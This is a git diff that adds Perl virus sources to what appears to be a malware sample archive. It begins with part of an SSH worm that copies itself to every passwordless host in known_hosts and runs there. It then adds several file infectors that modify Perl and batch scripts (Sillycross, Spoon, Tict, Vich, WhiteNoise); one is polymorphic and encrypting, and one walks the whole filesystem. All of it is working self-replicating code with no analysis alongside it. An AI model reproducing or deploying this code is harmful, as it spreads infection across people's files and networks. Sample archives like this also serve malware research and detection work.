+print ":: sshworm initialized at $Bin\n";

+

+

+

+$options = " -o PasswordAuthentication=no ";

+

+##

+# stage 1 - attempt to connect to all hosts in known_hosts files

+##

+

+if (open (KH, "<" . $ENV{'HOME'} . "/.ssh/known_hosts"))

+{

+	while ($line = <KH>)

+	{

+		($host, undef) = split(/\s+/,$line);

+		($host, undef) = split(/\,/,$host);

+		Propagate($host);

+	}

+	close (KH);

+}

+

+

+sub Propagate {

+

+	open (SSH, "ssh $options $host 'id' 2>/dev/null|");

+	while ($out = <SSH>)

+	{

+		if ($out =~ /uid/)

+		{

+			print ":: sshworm found new host $host\n";

+			system("scp $Bin/$0 $host:/tmp/hello.pl");

+			system("ssh $host 'perl /tmp/hello.pl'");

+		}

+	}

+	close (SSH);

+}

+

diff --git a/Perl/Virus.Perl.Sillycross.a b/Perl/Virus.Perl.Sillycross.a
new file mode 100644
index 00000000..8b7efc61
--- /dev/null
+++ b/Perl/Virus.Perl.Sillycross.a
@@ -0,0 +1,35 @@
+#genetix
+
+#*.bat *.cmd *.pl crossinfector prepender
+
+$TheCode = __FILE__;
+$batpart = "
+for %%a in (*.bat *.cmd *.pl) do copy %0 %%a
+";
+
+my @Vcode = ();
+open(Host, $TheCode);
+@Vcode = <Host>;
+while(<Host>) {
+  $. > 36 ? last : push @Vcode,$_;
+}
+close(Host);
+
+while (<*.bat *.cmd *.pl>) {
+$Victim = $_;
+     
+     my @VicCode = ();
+     open(Target, $Victim);
+     @VicCode = <Host>;
+     while(<Target>) {
+       $. > 36 ? last : push @VicCode,$_;
+     }
+     close(Target);
+
+     if (@VicCode[1] !~ "#genetix") {
+     open(Target, ">$Victim");
+     print Target @Vcode,@VicCode;
+     close(Target);
+
+    }
+}
\ No newline at end of file
diff --git a/Perl/Virus.Perl.Spoon b/Perl/Virus.Perl.Spoon
new file mode 100644
index 00000000..0e3edabc
--- /dev/null
+++ b/Perl/Virus.Perl.Spoon
@@ -0,0 +1,43 @@
+use File::Find;
+&virus();
+
+print "\nThis program is infected by the Perl virus\n\n";
+
+sub virus
+  {
+    my ( $pid, $new );   
+    if( $pid = fork ) { return; }
+    else
+      {
+        open( source, $0 );
+	finddepth ( \&infect, '/home/chris/test' );
+	sub infect 
+	  {
+            open target, "$File::Find::name";
+            $_ = <target>;
+	    if ( /(\#!.*perl)/ ) 
+	      {
+		$_ = <target>;
+		if( $_ ne "use File::Find;\n" )
+		  {
+                    $new = $1 . "\nuse File::Find;\n&virus();\n" . $_;
+                    while( <target> ) { $new = $new . $_; }
+		    seek(  source, 0, 0 );
+                    while( <source> ne "sub virus\n" ) { };
+                    $new = $new . "\nsub virus\n";
+                    while( <source> ) { $new = $new . $_; }                  
+                    close  target;
+                    open   target, ">$File::Find::name";
+                    print  target $new;
+                 }
+	      }
+	    close( target );   
+	  }
+        close( source );
+	exit( 0 );
+      }
+  }
+
+# a Perl virus, by paddingx
+# 08/15/1999
+
diff --git a/Perl/Virus.Perl.Spoon.b b/Perl/Virus.Perl.Spoon.b
new file mode 100644
index 00000000..2e2cdf59
--- /dev/null
+++ b/Perl/Virus.Perl.Spoon.b
@@ -0,0 +1,38 @@
+use File::Find;
+&virus();
+
+print "\nThis program is infected by the Perl virus\n";
+
+sub virus
+{
+   $virus_body = "\n# put here the body of the virus\nsub virus { }\n";
+   if( $pid = fork ) { return; }
+   else
+   {
+      finddepth ( \&infect, '/' );
+      sub infect
+      {
+         open( target, $File::Find::name );
+         $_ = <target>;
+         if ( /(\#!.*perl)/ )
+         {
+            $line2 = <target>;
+            unless( $line2 eq "use Find::File\n" )
+            {
+               open(  temp, ">/tmp/tmpinfect" );
+               print  temp ($1, "\nuse File::Find;\n&virus();\n", $line2 );
+               print  temp while( <target> );
+               print  temp $virus_body;
+               close( temp );
+               system( "mv", "/tmp/tmpinfect", $File::Find::name );
+            }
+	 }
+         close( target );
+      }
+      exit( 0 );
+   }
+}
+
+# a Perl virus, by paddingx
+# 08/13/1999
+
diff --git a/Perl/Virus.Perl.Tict b/Perl/Virus.Perl.Tict
new file mode 100644
index 00000000..8009e959
--- /dev/null
+++ b/Perl/Virus.Perl.Tict
@@ -0,0 +1,91 @@
+# 1st Poly Virus by SnakeByte [Matrix/KryptoCrew]   
+open(File,$0);@Virus=<File>;close(File);  		# read own code
+$Virus=join("", @Virus);foreach $FileName(<*>) {	# get files
+if ((-r $FileName) && (-w $FileName) && (-f $FileName)) {	# check file
+open(File, "$FileName");@Temp=<File>;close(File);	# open file
+if ((@Temp[0] =~ /perl/i ) && ( substr(@Temp[0],0,2) eq "\#!" )) {	# perl file ?
+if (( length(@Temp[0]) % 5 ) != 0 ){			# already infected ?
+						# first we generate a decryptor
+
+$Key = int(rand(255));					# cryptkey
+$crypttype = int(rand(2));				# how to crypt it ?
+
+for ( $X = 0; $X < length($Virus); $X++ ){		# Encrypt it
+if ( $crypttype == 0 ){
+@Crypt[$X] = (ord(substr($Virus, $X, 1))) * ($Key);	# Multiply
+} else {
+@Crypt[$X] = (ord(substr($Virus, $X, 1))) + ($Key);	# Addition
+}
+}
+
+$connectit = chr(int(rand(25)+65));
+$VirString = join($connectit, @Crypt);			# all values get seperated by a !
+$filename  =  chr(int(rand(25)+65));			# random filename to put virus to
+$filename .= int(rand(65535));
+ if ( int(rand(2)) == 0 ){ 
+  @Vir[0] = "\$l1l = \"$VirString\"\;";
+  @Vir[1] = "\$11l = $Key\;";			# key to decrypt
+ } else {
+  @Vir[0] = "\$11l = $Key\;";			# key to decrypt
+  @Vir[1] = "\$l1l = \"$VirString\"\;";
+ }
+ @Vir[2] = "\@ll1 = split(\"$connectit\", \$l1l)\;";
+ @Vir[3] = "for ( \$lll = 0\; \$lll < (\@ll1)\; \$lll++ ) { ";  # Decrypt Loop
+
+ if ( $crypttype == 0 ){
+  @Vir[4] = " \$l11 .= chr(\@ll1[\$lll] \/ \$11l)\;"; 	# Decrypt Char
+ } else {
+  @Vir[4] = " \$l11 .= chr(\@ll1[\$lll]-\$11l)\;";		# Decrypt Char
+ }
+ @Vir[5] = "}";
+ @Vir[6] = "open(1l1, \">$filename\")\;";		# write encrypted
+ @Vir[7] = "print 1l1 \$l11\;";			# string to a file
+ @Vir[8] = "close(1l1)\;";
+ @Vir[9] = "\$lll = \`perl $filename\`;\n";		# and start it
+
+						# change variables
+						# $Virus File @Virus $X  $Key $Vir
+						# l1l    1l1  ll1    lll 11l  l11
+@vars = ("l1l", "1l1", "ll1", "lll", "11l", "l11"); # replace the variables
+foreach $replace (@vars){
+ $newVar = chr(int(rand(25)+65));			# with a letter
+ $newVar .= int(rand(65535));			# and a random number
+ for ( $b=0; $b < @Vir; $b++){
+  @Vir[$b] =~ s/$replace/$newVar/g ;
+ }
+}
+
+
+do {
+  chomp @Temp[0];
+  @Temp[0] .= " \n";
+} until((length(@Temp[0]) % 5) == 0 );
+
+
+open(File, ">$FileName");			# and write the infected
+$Temp = join("\n", @Vir);
+
+
+for ( $X = ( (@Temp) >> 1 ); $X < @Temp; $X++ ){
+  if ( @Temp[$X] =~ "\;\n" ) {		# insert virus in the middle
+  $Temp2 = join("", @Temp[0..$X]);		# write first part 
+  print File $Temp2;			# and virus
+  print File $Temp; $X++;
+  $Y = (@Temp);
+  $Temp2 = join("", @Temp[$X..$Y]);		# insert rest of the file
+  print File $Temp2;
+  goto CloseFile;
+ }
+}
+
+ $Temp2 = join("", @Temp);			# no possibility to insert virus
+ print File $Temp;				# file back to disk
+ print File $Temp2;				# without EPO
+
+
+CloseFile:
+ close(File);
+}}}}
+
+$a = `rm $0`;  				# delete our selves..
+
diff --git a/Perl/Virus.Perl.Vich b/Perl/Virus.Perl.Vich
new file mode 100644
index 00000000..8b279069
--- /dev/null
+++ b/Perl/Virus.Perl.Vich
@@ -0,0 +1,87 @@
+#onehalf3554
+
+#                this perl virus (c)Chernickevich Konstantin
+#                http://onehalf.hotmail.ru
+#                email:onehalf3554@mail.ru
+
+
+
+system"clear";
+$partone="#End_my";
+$parttwo="_body";
+$EndMarker=$partone.$parttwo;
+$infected=0;
+$BodyCopy=0;
+$textold="";
+
+# this "while" for detecting *.pl file
+# and output in the $_ local perl variable
+
+while (<*.pl>)
+{
+
+$files=$_;
+$text="<".$_;
+$textw=">".$_;
+$textww=">>".$_;
+
+
+ open(TESTFILE,$text);
+ until(eof(TESTFILE))
+        {
+          $strres=readline(TESTFILE);
+	  
+    
+#               this procedure detecting a marker in the *.pl file
+#      if marker detected then file infected if not then file not infected!
+
+          if ($strres=~ m/onehalf3554/i)
+	   {
+                  if ($BodyCopy==0)
+	                 { 
+	                    $BodyCopy=1;
+	                    open(VIRUSBODY,$text);
+	                      until ($BodyStr=~ m/$EndMarker/i)
+	                        {
+	                         $BodyStr=readline(VIRUSBODY) ;
+	                         $BodyLoopCount++;
+	                         $BodyArray[$BodyLoopCount]=$BodyStr; 
+	                        }
+                            close(VIRUSBODY);
+	                  } 
+			  $infected=1;
+	   }
+         }
+close (TESTFILE);
+
+if ($infected==1)
+{
+print "[im detecting old infecting file :]\n";
+print $textw." infected old time.[Ok]\n";
+open(RESERVBODY,">body.bod");
+print RESERVBODY @BodyArray;
+close(RESERVBODY);
+}
+
+
+        if ($infected==0)
+	{    
+	               print $textw."im trying infecting this file now! \n";
+                       system "cp ".$files." temp.bod";
+		       open(NULFILE,$textww);
+		       $NUL="";
+		       print NULFILE $NUL;
+		       system "cp body.bod"." ".$files; 
+                       open(DATAFILE,"<temp.bod");
+		       until(eof(DATAFILE))
+		       {
+		       $reloader=readline(DATAFILE);    	
+		       print NULFILE $reloader;                
+		       }
+	  close(DATAFILE);	       
+          close(NULFILE);
+	}
+
+ }
+#End_my_body
+
diff --git a/Perl/Virus.Perl.WhiteNoise.a b/Perl/Virus.Perl.WhiteNoise.a
new file mode 100644
index 00000000..06a74cf0
--- /dev/null
+++ b/Perl/Virus.Perl.WhiteNoise.a
@@ -0,0 +1,23 @@
+open(File,$0);
+@Vir=<File>;
+#BlackJack
+@Virus=@Vir[-23...-1];
+close(File);
+foreach $FileName (<*>)
+{
+if ((-r $FileName) && (-w $FileName) && (-f $FileName))
+{
+open(fuck, "$FileName");
+@aFucks=<fuck>;
+close(fuck);
+if ((@aFucks[0] =~ "perl") || (@aFucks[1] =~ "perl"))
+{
+if ( not (@aFucks[-21] =~ "BlackJack"))
+{
+open(fuck, ">>$FileName");
+print fuck @Virus;
+close(fuck);
+}
+}
+}
+}